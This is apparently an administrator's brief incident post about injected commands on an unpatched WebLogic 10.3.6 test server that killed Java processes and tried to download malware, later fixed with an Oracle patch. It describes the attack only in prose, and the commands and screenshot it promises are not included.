WLS 10.3.6 Vulnerability Issue
We recently experienced a security-related issue* with our Test environment WebLogic Server (WLS), the application server running our WebCenter Content (WCC) instance.
In short, code was being injected onto the Linux server running WLS & WCC, either through a SOAP or a WebService call. This showed up as terminal commands that appear to be designed to identify, find, and kill running Java processes (pearl and python as well). It would then download the malware, and rename it to mimic the killed Java processes.
The network firewall prevented downloading of the software. However we were still facing frequent shutdowns of the Java processes (which is what Oracle WLS, WCC, & Node Manager run as).
I obtained the appropriate patch through Oracle Support, that should prevent the remote sending of the shutdown scripts, and so far appears to be doing fine.
Below is the terminal commands that were injected and executed on the server. This was found when scrolling through the history of the Linux user which “owns” and execute the Oracle services on the Linux server.
So far, I have seen this in Linux environments, however we do not know if Windows is immune or not.
A screenshot of the matrix form the Support Document is below.
*Note: This only affects public facing web server with no HTTPS!